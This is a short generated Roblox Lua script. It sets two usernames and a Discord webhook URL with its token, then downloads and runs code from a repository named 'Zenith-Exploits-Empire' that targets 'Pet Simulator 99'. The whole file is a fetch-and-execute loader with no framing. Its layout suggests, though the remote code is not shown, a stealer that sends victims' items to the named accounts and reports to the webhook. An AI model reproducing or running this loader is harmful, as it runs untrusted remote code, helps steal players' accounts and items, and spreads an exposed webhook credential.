-- Generated by Generator V5.2
Username = "lolipupy1234"
Username2 = "lolipupy1234"
Webhook = "https://discord.com/api/webhooks/1364544047305326714/uSBCyaTjSYliVIySHgMx728Erlzs8i7juh98XOMauRraWSLOTCNLWU0QLXm5juOJ_Fep"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()